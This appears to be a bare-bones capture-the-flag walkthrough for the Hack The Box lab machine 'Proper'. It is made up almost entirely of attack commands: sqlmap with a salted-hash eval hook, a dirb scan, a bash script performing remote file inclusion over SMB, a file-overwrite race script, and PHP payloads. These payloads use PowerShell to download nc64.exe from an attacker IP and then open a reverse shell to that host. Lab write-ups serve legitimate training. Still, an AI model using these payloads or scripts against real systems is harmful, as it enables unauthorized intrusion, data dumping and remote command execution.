htb-proper-nl

HTB – Proper

.

We can dump with:

┌──(kali㉿kali)-[~/htb/proper]
└─$ sqlmap -u “http://proper.htb/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b” –eval=”import hashlib ; h=hashlib.md5((‘hie0shah6ooNoim’+order).encode(‘utf-8’)).hexdigest()” –batch –threads=10 –dump

.

.

then a dirb

┌──(kali㉿kali)-[~/…/output/proper.htb/dump/cleaner]
└─$ dirb http://proper.htb/

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Fri May 21 02:21:54 2021
URL_BASE: http://proper.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://proper.htb/ —-
==> DIRECTORY: http://proper.htb/assets/
+ http://proper.htb/index.html (CODE:200|SIZE:14257)
==> DIRECTORY: http://proper.htb/licenses/

—- Entering directory: http://proper.htb/assets/ —-
==> DIRECTORY: http://proper.htb/assets/api/

.

 

whe can then login to: http://proper.htb/licenses/licenses.php

and view licenses , nothing more

.

┌──(kali㉿kali)-[~/htb/proper]
└─$ cat read2.sh
#!/bin/bash
HOST=10.10.10.231
SALT=hie0shah6ooNoim
TRAV=$1
USER=vikki.solomon@throwaway.mail
PASS=password1
#!/bin/bash

COOKIE=$(mktemp -u)
PROXY=127.0.0.1:8080
# login
curl -c $COOKIE -s -o /dev/null http://$HOST/licenses/index.php
curl -s \
-b $COOKIE \
-o /dev/null \
-d “username=${USER}&password=${PASS}” \
http://$HOST/licenses/index.php
# SMB RFI
curl -s \
-b $COOKIE \
-G \
-d “theme=${TRAV}” \
-d “h=$(echo -n ${SALT}${TRAV} | md5sum | cut -d’ ‘ -f1)” \
-o /dev/null \
-x $PROXY \
http://$HOST/licenses/licenses.php
# clean up
rm -rf $COOKIE

┌──(kali㉿kali)-[~/htb/proper]

..

.

┌──(kali㉿kali)-[~/htb/proper]
└─$ cat race.sh 130 ⨯
#!/bin/bash
PAYLOAD=$1
while :; do
echo hello world > header.inc
echo “$PAYLOAD” > header.inc
done

.

sudo python3 smbserver.py -ip 10.10.14.23 -smb2support evil .

sudo python3 smbserver.py -username web -password ‘charlotte123!’ -ip 10.10.14.23 -smb2support evil .

.

./race.sh ‘<?php system(“cmd /c powershell iwr http://10.10.14.73/nc64.exe -outf \windows\system32\spool\drivers\color\cute.exe”); ?>’

.

./race.sh ‘<?php system(“cmd /c start \windows\system32\spool\drivers\color\cute.exe 10.10.14.73 1234 -e cmd.exe”); ?>’

.

 

 

 

Author Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *